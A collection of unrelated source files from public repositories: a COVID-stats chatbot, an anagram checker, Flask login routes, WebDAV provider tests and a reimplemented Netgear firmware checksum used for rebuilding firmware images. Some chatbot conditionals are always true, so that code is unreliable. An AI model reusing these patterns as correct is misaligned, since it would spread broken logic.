response_statement = Statement(text='Confirmed Uk Cases {}'.format(confirmed))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'uk deaths' in user_input:
deaths = uk_response[0].get("deaths", "")
response_statement = Statement(text='Confirmed Uk Deaths {}'.format(deaths))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'uk recovered' in user_input:
recovered = uk_response[0].get("recovered", "")
response_statement = Statement(text='Recovered Uk Cases {}'.format(recovered))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'uk critical' in user_input:
critical = uk_response[0].get("critical", "")
response_statement = Statement(text='Critical Uk Cases {}'.format(critical))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us confirmed' in user_input:
confirmed = us_response[0].get("confirmed", "")
response_statement = Statement(text='Confirmed Us Cases {}'.format(confirmed))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us deaths' in user_input:
deaths = us_response[0].get("deaths", "")
response_statement = Statement(text='Confirmed Us Deaths {}'.format(deaths))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us recovered' in user_input:
recovered = us_response[0].get("recovered", "")
response_statement = Statement(text='Recovered Us Cases {}'.format(recovered))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'us critical' in user_input:
critical = us_response[0].get("critical", "")
response_statement = Statement(text='Critical Us Cases {}'.format(critical))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'all' and 'us' in user_input:
response_statement = Statement(text='United States Stats: {}'.format(
'\nconfirmed: ' + str(us_response[0].get("confirmed", "")) +
'\nrecovered: ' + str(us_response[0].get("recovered", "")) +
'\ncritical: '+ str(us_response[0].get("critical", "")) +
'\ndeaths: '+ str(us_response[0].get("deaths", ""))
))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'all' and 'uk' in user_input:
response_statement = Statement(text='United Kingdom Stats: {}'.format(
'\nconfirmed: ' + str(uk_response[0].get("confirmed", "")) +
'\nrecovered: ' + str(uk_response[0].get("recovered", "")) +
'\ncritical: '+ str(uk_response[0].get("critical", "")) +
'\ndeaths: '+ str(uk_response[0].get("deaths", ""))
))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'news' or 'positive' or 'happy' or 'good' in user_input:
response_statement = Statement(news_response)
response_statement.confidence = .8
logging.info(response_statement)
return response_statement
elif 'hi' or 'howdy' or 'hello' in user_input:
#add help response
responses = ["""Hello \U0001F31F""", "Hi there!"]
response_statement = Statement(random.choice(responses))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
elif 'bye' or 'ciao' or 'adios' or 'its been real' in user_input:
#add help response
responses = ["""Bye \U0001F31F""", "Chat later!", "Have a good one"]
response_statement = Statement(random.choice(responses))
response_statement.confidence = 1
logging.info(response_statement)
return response_statement
else:
response_statement = Statement(text="I'm sorry I could not understand")
response_statement.confidence = 0
return response_statement
| 6,124 |
anagram.py
|
Rahulnigam28/Anagram
| 2 |
2169343
|
#~/usr/bin/python
# function to input strings and check if they are anagram
def is_anagram (s1, s2):
if s1 == s2:
return False
elif len(s1) == len(s2):
x = list(s1)
y = list(s2)
for i in range(0 , len (x)):
for j in range (0 , len (y)):
if x[i] == y[j]:
del y[j]
break
if len(y) == 0:
return True
else:
return False
else:
return False
t = int(input("Enter number of files to read\n"))
filename = []
r = []
for files in range(0, t):
# function to read file and put the words in list
filename.append(raw_input("Enter name of the file:\r\t\t\t"))
r.append( open(filename[files] ,"r").read().split())
# main function
for files in range(0 , t):
x = r[files]
anagram = {}
for i in range(0, len(x)):
for j in range(1, len (x)):
if x[i] != "" or x[j] != "":
result = is_anagram(x[i],x[j])
if result == True:
del x[j]
x.insert(j,"")
val = len(x[i])
key = x[i]
anagram[key] = val
print("\n \t\t\t %s" %filename[files])
print("Total Number of Words : %d " %len(x))
print ("Numer of Unique Anagrams : %d " %len(anagram))
print("Length of the Longest Anagram: %s \n" %max(anagram.values()))
| 2,205 |
pil_image_analysis_funcs/pilget_exif_data.py
|
SecTraversl/Toolbox_Python_3.8
| 0 |
2170874
|
# %%
#######################################
def pilget_exif_data(image_file: str):
from PIL import Image
from PIL.ExifTags import TAGS
theimage = Image.open(image_file)
dict_exif_data = theimage.getexif()
for name,data in dict_exif_data.items():
tagname = TAGS.get(name, "unknown-tag")
print(f"TAG:{name} ({tagname}) is assigned {data}")
| 381 |
src/controllers/route_controllers_system.py
|
Ron-Chang/spending_tracker_old
| 0 |
2169978
|
from flask import request, jsonify, url_for, redirect
from common.models import User, AdminUser
@app.route('/member_register', methods=['POST'])
def member_register():
"""
註冊 會員
"""
request_data = request.get_json()
email = request_data.get('email')
username = request_data.get('username')
non_hash_password = request_data.get('password')
hash_password = Encrypt.encrypt_password(non_hash_password)
source = OAuthType.OUR
user = User(email=email,
username=username,
password=hash_password,
source=source)
db.session.add(user)
db.session.commit()
response_data = {'email': email, 'username': username, 'source': source}
return jsonify(response_data)
@app.route('/member_login', methods=['POST'])
def member_login():
"""
登錄 會員
"""
request_data = request.get_json()
email = request_data.get('email')
password = request_data.get('password')
user = User.query.filter_by(email=email).first()
if not user:
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
if not Encrypt.check_password(user.password, password):
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
token = Login(user=user, email=email).get_token()
response_data = {'email': user.email, 'username': user.username, 'token': token, 'source': user.source}
return jsonify(response_data)
@app.route('/admin_login', methods=['POST'])
def admin_login():
"""
登錄 管理員
"""
request_data = request.get_json()
username = request_data.get('username')
password = request_data.get('password')
user = AdminUser.query.filter_by(username=username).first()
if not user:
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
if not Encrypt.check_password(user.password, password):
raise ValidationError(error_code=ErrorCodeDefine.USER_NOT_EXIST_OR_WRONG_PASSWORD)
token = AdminLogin(user=user, username=username).get_token()
response_data = {'email': user.email, 'username': user.username, 'token': token}
return jsonify(response_data)
| 2,203 |
old/ipr2tsv.py
|
orionzhou/biolib
| 3 |
2166583
|
#!/usr/bin/env python
import os
import os.path as op
import sys
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description = 'parse interproscan output'
)
parser.add_argument(
'fi', help = 'input file'
)
parser.add_argument(
'fo', help = 'output file (tsv)'
)
args = parser.parse_args()
(fi, fo) = (args.fi, args.fo)
dic = dict()
fhi = open(fi, "r")
for line in fhi:
ps = line.strip().split("\t")
aid, md5, plen, aly, sname, sdesc, beg, end, score, status, date = ps[0:11]
iid = ps[11] if len(ps) >= 12 else ''
gid = ps[13] if len(ps) >= 14 else ''
if not aid in dic:
dic[aid] = [set(), set()]
iids = iid.split(",")
for iid in iids:
if iid:
dic[aid][0].add(iid)
gids = gid.split("|")
for gid in gids:
if gid:
dic[aid][1].add(gid)
fhi.close()
fho = open(fo, "w")
for aid, lst in dic.items():
iids, gids = lst
fho.write("%s\t%s\n" % (aid, ";".join(gids)))
fho.close()
| 1,143 |
tests/providers/owncloud/test_provider.py
|
alexschiller/waterbutler
| 0 |
2167556
|
import pytest
import io
from http import client
import aiohttpretty
from waterbutler.core import streams
from waterbutler.core import exceptions
from waterbutler.core.path import WaterButlerPath
from waterbutler.providers.owncloud import OwnCloudProvider
from waterbutler.providers.owncloud.metadata import OwnCloudFileMetadata
from waterbutler.providers.owncloud.metadata import OwnCloudFolderMetadata
@pytest.fixture
def auth():
return {
'name': 'cat',
'email': '<EMAIL>',
}
@pytest.fixture
def credentials():
return {'username':'cat',
'password':'<PASSWORD>',
'host':'https://cat/owncloud'}
@pytest.fixture
def settings():
return {'folder': '/my_folder', 'verify_ssl':False}
@pytest.fixture
def provider(auth, credentials, settings):
return OwnCloudProvider(auth, credentials, settings)
@pytest.fixture
def folder_list():
return b'''<?xml version="1.0" ?>
<d:multistatus xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns" xmlns:s="http://sabredav.org/ns">
<d:response>
<d:href>/owncloud/remote.php/webdav/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>714783</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"57688dd358fb7"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
<d:response>
<d:href>/owncloud/remote.php/webdav/Documents/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>36227</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"57688dd3584b0"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
<d:response>
<d:href>/owncloud/remote.php/webdav/Photos/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Wed, 15 Jun 2016 22:49:40 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>678556</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"5761db8485325"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
</d:multistatus>'''
@pytest.fixture
def folder_metadata():
return b'''<?xml version="1.0" ?>
<d:multistatus xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns" xmlns:s="http://sabredav.org/ns">
<d:response>
<d:href>/owncloud/remote.php/webdav/Documents/</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified>
<d:resourcetype>
<d:collection/>
</d:resourcetype>
<d:quota-used-bytes>36227</d:quota-used-bytes>
<d:quota-available-bytes>-3</d:quota-available-bytes>
<d:getetag>"57688dd3584b0"</d:getetag>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
</d:multistatus>'''
@pytest.fixture
def file_metadata():
return b'''<?xml version="1.0"?>
<d:multistatus xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns" xmlns:oc="http://owncloud.org/ns">
<d:response>
<d:href>/owncloud/remote.php/webdav/Documents/dissertation.aux</d:href>
<d:propstat>
<d:prop>
<d:getlastmodified>Sun, 10 Jul 2016 23:28:31 GMT</d:getlastmodified>
<d:getcontentlength>3011</d:getcontentlength>
<d:resourcetype/>
<d:getetag>"a3c411808d58977a9ecd7485b5b7958e"</d:getetag>
<d:getcontenttype>application/octet-stream</d:getcontenttype>
</d:prop>
<d:status>HTTP/1.1 200 OK</d:status>
</d:propstat>
</d:response>
</d:multistatus>'''
@pytest.fixture
def file_content():
return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS'
@pytest.fixture
def file_like(file_content):
return io.BytesIO(file_content)
@pytest.fixture
def file_stream(file_like):
return streams.FileStreamReader(file_like)
class TestValidatePath:
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_validate_v1_path_file(self, provider, file_metadata):
path = WaterButlerPath('/triangles.txt', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
try:
wb_path_v1 = await provider.validate_v1_path('/triangles.txt')
except Exception as exc:
pytest.fail(str(exc))
wb_path_v0 = await provider.validate_path('/triangles.txt')
assert wb_path_v1 == wb_path_v0
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_validate_v1_path_folder(self, provider, folder_metadata):
path = WaterButlerPath('/myfolder/', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=folder_metadata, auto_length=True, status=207)
try:
wb_path_v1 = await provider.validate_v1_path('/myfolder/')
except Exception as exc:
pytest.fail(str(exc))
wb_path_v0 = await provider.validate_path('/myfolder/')
assert wb_path_v1 == wb_path_v0
class TestCRUD:
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_download(self, provider, file_metadata, file_like):
path = WaterButlerPath('/triangles.txt', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
aiohttpretty.register_uri('GET', url, body=b'squares', auto_length=True, status=200)
result = await provider.download(path)
content = await result.response.read()
assert content == b'squares'
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_upload(self, provider, file_stream, file_metadata):
path = WaterButlerPath('/phile', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
aiohttpretty.register_uri('PUT', url, body=b'squares', auto_length=True, status=201)
metadata, created = await provider.upload(file_stream, path)
expected = OwnCloudFileMetadata('dissertation.aux','/owncloud/remote.php/webdav/Documents/phile',
{'{DAV:}getetag':'"a3c411808d58977a9ecd7485b5b7958e"',
'{DAV:}getlastmodified':'Sun, 10 Jul 2016 23:28:31 GMT',
'{DAV:}getcontentlength':3011})
assert created is True
assert metadata.name == expected.name
assert metadata.size == expected.size
assert aiohttpretty.has_call(method='PUT', uri=url)
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_delete(self, provider, file_metadata):
path = WaterButlerPath('/phile', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207)
path = await provider.validate_path('/phile')
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('DELETE', url, status=204)
await provider.delete(path)
class TestMetadata:
@pytest.mark.asyncio
@pytest.mark.aiohttpretty
async def test_metadata(self, provider, folder_list):
path = WaterButlerPath('/', prepend=provider.folder)
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=folder_list, auto_length=True, status=207)
path = await provider.validate_path('/')
url = provider._webdav_url_ + path.full_path
aiohttpretty.register_uri('PROPFIND', url, body=folder_list, status=207)
result = await provider.metadata(path)
assert isinstance(result, list)
assert len(result) == 2
assert result[0].kind == 'folder'
assert result[0].name == 'Documents'
class TestOperations:
async def test_can_intra_copy(self, provider):
assert provider.can_intra_copy(provider)
async def test_can_intra_move(self, provider):
assert provider.can_intra_move(provider)
| 9,542 |
src/main/docker/images.bzl
|
VideoAmp/cross-media-measurement
| 4 |
2170592
|
# Copyright 2020 The Cross-Media Measurement Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Container image specs."""
load("//build:variables.bzl", "IMAGE_REPOSITORY_SETTINGS")
_PREFIX = IMAGE_REPOSITORY_SETTINGS.repository_prefix
# List of specs for all Docker containers to push to a container registry.
# These are common to both local execution (e.g. in Kind) as well as on GKE.
COMMON_IMAGES = [
struct(
name = "duchy_async_computation_control_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:async_computation_control_server_image",
repository = _PREFIX + "/duchy/async-computation-control",
),
struct(
name = "duchy_herald_daemon_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/daemon/herald:herald_daemon_image",
repository = _PREFIX + "/duchy/herald",
),
struct(
name = "duchy_liquid_legions_v2_mill_daemon_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/daemon/mill/liquidlegionsv2:gcs_liquid_legions_v2_mill_daemon_image",
repository = _PREFIX + "/duchy/liquid-legions-v2-mill",
),
struct(
name = "duchy_publisher_data_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:publisher_data_server_image",
repository = _PREFIX + "/duchy/publisher-data",
),
struct(
name = "duchy_spanner_computations_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:spanner_computations_server_image",
repository = _PREFIX + "/duchy/spanner-computations",
),
struct(
name = "kingdom_global_computation_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:global_computation_server_image",
repository = _PREFIX + "/kingdom/global-computation",
),
struct(
name = "kingdom_requisition_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:requisition_server_image",
repository = _PREFIX + "/kingdom/requisition",
),
struct(
name = "kingdom_system_requisition_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:system_requisition_server_image",
repository = _PREFIX + "/kingdom/system-requisition",
),
struct(
name = "kingdom_data_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/gcloud/server:gcp_kingdom_data_server_image",
repository = _PREFIX + "/kingdom/data-server",
),
struct(
name = "setup_spanner_schema_image",
image = "//src/main/kotlin/org/wfanet/measurement/tools:push_spanner_schema_image",
repository = _PREFIX + "/setup/push-spanner-schema",
),
]
# List of specs for all Docker containers to push to a container registry.
# These are only used on GKE.
GKE_IMAGES = [
struct(
name = "duchy_computation_control_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:gcs_computation_control_server_image",
repository = _PREFIX + "/duchy/computation-control",
),
struct(
name = "duchy_metric_values_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:gcp_server_image",
repository = _PREFIX + "/duchy/metric-values",
),
]
# List of image build rules that are only used locally (e.g. in Kind).
LOCAL_IMAGES = [
struct(
name = "forwarded_storage_liquid_legions_v2_mill_daemon_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/daemon/mill/liquidlegionsv2:forwarded_storage_liquid_legions_v2_mill_daemon_image",
),
struct(
name = "forwarded_storage_computation_control_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:forwarded_storage_computation_control_server_image",
),
struct(
name = "spanner_forwarded_storage_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:spanner_forwarded_storage_server_image",
),
struct(
name = "fake_storage_server_image",
image = "//src/main/kotlin/org/wfanet/measurement/storage/filesystem:server_image",
),
]
ALL_GKE_IMAGES = COMMON_IMAGES + GKE_IMAGES
ALL_LOCAL_IMAGES = COMMON_IMAGES + LOCAL_IMAGES
| 5,058 |
part_7/firmware_building/checksums/libacos.py
|
zcutlip/broken_abandoned
| 28 |
2168436
|
#!/usr/bin/env python
import sys
"""
reimplementation of calculate_checksum() from
netgear libacos_shared.so
binary MD5: 660c1e24aa32c4e096541e6147c8b56e libacos_shared.so
"""
class LibAcosChecksum(object):
def __init__(self,data,data_len,checksum_offset=-1):
self.dword_623A0=0
self.dword_623A4=0
fake_checksum="\x00\x00\x00\x00"
self.data=data[0:data_len]
if(checksum_offset > -1):
self.data=(self.data[0:checksum_offset]+
fake_checksum+
self.data[checksum_offset+len(fake_checksum):])
self._update(self.data[0:data_len])
self._finalize()
def _update(self,data):
size=len(data)
t0=self.dword_623A0
a0=self.dword_623A4
a2=size
a3=0
while a3 != a2:
v1=ord(data[a3])
a3+=1
a0=(a0+v1) & 0xffffffff
t0=(t0+a0) & 0xffffffff
self.dword_623A0=t0
self.dword_623A4=a0
return 1
def _finalize(self):
v0=self.dword_623A0
v1=self.dword_623A4
a0=(v0 & 0xffff)
v0=(v0>>16 )
v0=(v0+a0) & 0xffffffff
a2=(v1 & 0xffff)
v1=(v1>>16)
v1=(v1+a2) & 0xffffffff
a1=v0>>16
a1=(a1+v0) & 0xffffffff
a0=v1>>16
a1=(a1 & 0xffff)
a0=(a0+v1) & 0xffffffff
a0=(a0 & 0xffff)
v0=(a1<<16) & 0xffffffff
a2=(v0 | a0)
v0=a2
self.dword_623A4=a0
self.dword_623A0=a1
self.checksum = v0
if __name__=="__main__":
firmware=sys.argv[1]
size=int(sys.argv[2],0)
data=open(firmware,"rb").read()
if size > len(data):
raise Exception("size: %d is longer than data length: %d" % (size,len(data)))
checksum=LibAcosChecksum(data,size).checksum
print("Checksum: 0x%08x" % checksum)
| 1,986 |
applications/piraoke/models/0.py
|
Querra/piraoke
| 0 |
2169806
|
from gluon.storage import Storage
settings = Storage()
settings.migrate = True
settings.title = 'Piraoke'
settings.subtitle = 'powered by web2py'
settings.author = '<NAME>'
settings.author_email = '<EMAIL>'
settings.keywords = 'pi, karaoke'
settings.description = 'Karaoke application for raspberry pi'
settings.layout_theme = 'Default'
settings.database_uri = 'sqlite://storage.sqlite'
settings.security_key = '56f5254c-1be4-4abf-8a5f-132c872ac9a9'
settings.email_server = 'localhost'
settings.email_sender = '<EMAIL>'
settings.email_login = ''
settings.login_method = 'local'
settings.login_config = ''
settings.plugins = []
| 628 |
api/app/auth/api_routes.py
|
Sguerreroo/electricity-market-analysis
| 0 |
2169265
|
import random
from flask import request, make_response
from werkzeug.security import check_password_hash
from flask_jwt_extended import (
jwt_required, create_access_token,
jwt_refresh_token_required, create_refresh_token,
get_jwt_identity, set_access_cookies,
set_refresh_cookies, unset_jwt_cookies
)
from . import auth_bp
from .models import User
from app.models import Potential_Customer_Notification
from app.customer.models import Customer
from app.company.models import Company
from .schemas import UserSchema
from app.customer.schemas import CustomerSchema
from app.company.schemas import CompanySchema
@auth_bp.route("/signup-customer", methods=["POST"])
def signup_customer():
if not request.is_json:
return "Missing JSON in request", 400
data = request.get_json()
errors = {}
errors.update(validateUser(data))
errors.update(validateCustomer(data))
if errors:
return errors, 422
if User.get_by_username(data['username']):
return {"username": ["Nombre de usuario no disponible"]}, 422
if Customer.get_by_nif(data['nif']):
return {"nif": ["Este NIF ya ha sido registrado"]}, 422
user = User(username=data['username'], user_type=1)
user.set_password(data['password'])
user.save()
customer = Customer(
nif=data['nif'].upper(),
name=data['name'],
surname=data['surname'],
email=data['email'],
user_id=user.id
)
customer.save()
companies = Company.get_random_companies(random.randint(20, 40))
for company in companies:
p_c_n = Potential_Customer_Notification(
nif=customer.nif,
cif=company.cif
)
p_c_n.save()
return "", 200
@auth_bp.route('/signup-company', methods=["POST"])
def signup_company():
if not request.is_json:
return "Missing JSON in request", 400
data = request.get_json()
errors = {}
errors.update(validateUser(data))
errors.update(validateCompany(data))
if errors:
return errors, 422
if User.get_by_username(data['username']):
return {"username": ["Nombre de usuario no disponible"]}, 422
if Company.get_by_cif(data['cif']):
return {"cif": ["Este CIF ya ha sido registrado"]}, 422
user = User(username=data['username'], user_type=0)
user.set_password(data['password'])
user.save()
company = Company(
cif=data['cif'].upper(),
name=data['name'],
address=data['address'],
url=data['url'],
email=data['email'],
company_type=data['companytype'],
phone=data['phone'],
user_id=user.id
)
company.save()
return "", 200
@auth_bp.route("/login", methods=["POST"])
def login():
if not request.is_json:
return "Missing JSON in request", 400
data = request.get_json()
username = data['username']
password = data['password']
user = User.get_by_username(username)
if user and user.check_password(password):
access_token = create_access_token(identity=username)
refresh_token = create_refresh_token(identity=username)
result_response = {
"login": True,
"user_type": user.user_type
}
if user.user_type == 0:
company = Company.get_by_user_id(user.id)
result_response["company_type"] = company.company_type
response = make_response(result_response)
set_access_cookies(response, access_token)
set_refresh_cookies(response, refresh_token)
return response, 200
return "User or password incorrect", 400
@auth_bp.route('/logout', methods=["POST"])
def logout():
resp = make_response({'logout': True})
unset_jwt_cookies(resp)
return resp, 200
def validateUser(data):
user = {
"username": data["username"],
"password": data["password"],
"passwordconfirmation": data["passwordconfirmation"]
}
user = {k: v for k, v in user.items() if v}
return UserSchema().validate(user)
def validateCustomer(data):
customer = {
"nif": data["nif"],
"name": data["name"],
"surname": data["surname"],
"email": data["email"],
}
customer = {k: v for k, v in customer.items() if v}
return CustomerSchema().validate(customer)
def validateCompany(data):
company = {
"name": data["name"],
"cif": data["cif"],
"url": data["url"],
"email": data["email"],
"phone": data["phone"],
}
company = {k: v for k, v in company.items() if v}
return CompanySchema().validate(company)
| 4,128 |
fediverse/views/renderer/activity/Create.py
|
YuzuRyo61/CrossPlan
| 8 |
2169592
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from django.urls import reverse
from fediverse.models import User
def RenderCreate(uuid, actor, obj):
target = User.objects.get(username__iexact=actor)
return {
"id": f"https://{settings.CP_ENDPOINT}{reverse('Fediverse:PostActivity', kwargs={'uuid': str(uuid)})}",
"type": "Create",
"actor": f"https://{settings.CP_ENDPOINT}{reverse('UserShow', kwargs={'username': target.username})}",
"object": obj
}
| 528 |
utils/src/utils/time_data.py
|
RoboHubEindhoven/suii_control
| 0 |
2170855
|
import yaml
class Time(yaml.YAMLObject):
yaml_loader = yaml.SafeLoader
yaml_tag = u'!Time'
def __init__(self, secs , nsecs):
self.secs = secs
self.nsecs = nsecs
| 191 |
dl_wl_imgs.py
|
HenriTEL/wedding
| 0 |
2170100
|
#!/usr/bin/env python3
"""Download images provided in wedding-list.csv"""
import csv
import subprocess
WEDDING_LIST_IMG_DIR = "static/img/wedding-list/"
WEDDING_LIST_CSV = "backend/db/wedding-list.csv"
with open(WEDDING_LIST_CSV) as csvfile:
reader = csv.reader(csvfile, quotechar='"')
next(reader)
images_urls = {row[3] for row in reader}
cmd = ['wget', '--no-clobber', '-P', WEDDING_LIST_IMG_DIR] + list(images_urls)
subprocess.run(cmd)
| 454 |
zookeeper/kazoo-update.py
|
li-ma/homework
| 0 |
2170629
|
import time
from kazoo.client import KazooClient
from kazoo.client import KazooState
import logging
logging.basicConfig()
def my_listener(state):
if state == KazooState.LOST:
# Register somewhere that the session was lost
print 'The session is lost: %s' % str(state)
elif state == KazooState.SUSPENDED:
# Handle being disconnected from Zookeeper
print 'The session is suspended: %s' % str(state)
else:
# Handle being connected/reconnected to Zookeeper
print 'The session is reconnected: %s' % str(state)
zk = KazooClient(hosts='127.0.0.1:2181')
zk.start()
zk.add_listener(my_listener)
# Ensure a path, create if necessary
zk.ensure_path("/dragonflow/table1")
# Determine if a node exists
if zk.exists("/dragonflow/table1/key1"):
# Do transaction
transaction = zk.transaction()
transaction.create('/dragonflow/table1/key9', b"value9")
transaction.set_data('/dragonflow/table1/key1', b"value8")
results = transaction.commit()
print(results)
result = zk.get('/dragonflow/table1/key8')
print result[0]
| 1,079 |
cyberpunk/cyberpunk_endpoint.py
|
jonaylor89/cyberpunk
| 5 |
2170410
|
import logging
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Type
from cyberpunk.transformations import TransformationInput
from cyberpunk.transformations.concat import ConcatInput
from cyberpunk.transformations.fade_in import FadeInInput
from cyberpunk.transformations.fade_out import FadeOutInput
from cyberpunk.transformations.repeat import RepeatInput
from cyberpunk.transformations.reverse import ReverseInput
from cyberpunk.transformations.slice import SliceInput
@dataclass
class CyberpunkEndpoint:
"""
{
"audio": "celtic_pt2.mp3",
"hash": "=",
"reverse": true,
"repeat": 1,
"slice": {
"start": 1000,
"end": 5000,
}
}
"""
# path: str
audio: str
hash: str = "unsafe"
format: str = "mp3"
reverse: Optional[ReverseInput] = None
repeat: Optional[RepeatInput] = None
slice: Optional[SliceInput] = None
fade_in: Optional[FadeInInput] = None
fade_out: Optional[FadeOutInput] = None
concat: Optional[ConcatInput] = None
@classmethod
def from_req(cls, key: str, args: Dict):
endpoint = cls(audio=key, hash="unsafe")
lookup_table: Dict[str, Type[TransformationInput]] = {
"reverse": ReverseInput,
"repeat": RepeatInput,
"slice": SliceInput,
"concat": ConcatInput,
"fade_in": FadeInInput,
"fade_out": FadeOutInput,
}
supported_formats: List[str] = [
"mp3",
"wav",
"flac",
]
# Parse request args and fill corresponding fields
for (k, v) in args.items():
if k in lookup_table.keys():
logging.info(f"parsing transformation input: {k}")
parser: Type[TransformationInput] = lookup_table[k]
try:
inputs: Dict[str, Any] = parser.from_str(v)
except Exception as e:
logging.error(
f"failure to parse input `{v}` for `{k}` : {e}",
)
continue
# This only works because attributes are the same name
# as the query parameters. If that stops being the case,
# another map/lookup-table will need to be used
# i.e. setattr(endpoint, param_to_attr[k], inputs)
setattr(endpoint, k, inputs)
# default formatting is mp3
file_format = (
args["format"]
if "format" in args.keys() and args["format"] in supported_formats
else "mp3"
)
endpoint.format = file_format
return endpoint
def __repr__(self) -> str:
params = []
if self.reverse is not None:
params.append(f"reverse={self.reverse}")
if self.repeat is not None:
params.append(f"repeat={self.repeat}")
if self.slice is not None:
params.append(f"slice={self.slice}")
if self.concat is not None:
params.append(f"concat={self.concat}")
if self.fade_in is not None:
params.append(f"fade_in={self.fade_in}")
if self.fade_out is not None:
params.append(f"fade_out={self.fade_out}")
return f"/{self.audio}{('?' + '&'.join(params)) if len(params) > 0 else ''}"
def __str__(self) -> str:
params = []
if self.reverse is not None:
params.append(f"reverse={self.reverse}")
if self.repeat is not None:
params.append(f"repeat={self.repeat}")
if self.slice is not None:
params.append(f"slice={self.slice}")
if self.concat is not None:
params.append(f"concat={self.concat}")
if self.fade_in is not None:
params.append(f"fade_in={self.fade_in}")
if self.fade_out is not None:
params.append(f"fade_out={self.fade_out}")
return f"/{self.audio}{('?' + '&'.join(params)) if len(params) > 0 else ''}"
| 4,076 |
process/network/find_verified_user.py
|
LiuQL2/twitter
| 1 |
2168992
|
#!/usr/bin/python env
# -*- coding: utf-8 -*-
import json
import csv
import os
import numpy as np
import time
import pandas as pd
from collections import OrderedDict
from utility.functions import get_dirlist
from utility.functions import write_log
def find_user(path_data,path_save_to,file_save_to):
file_name_list = get_dirlist(path = path_data, key_word_list=['part-r','.json','<KEY>'],no_key_word_list=['crc'])
print len(file_name_list)
time.sleep(40)
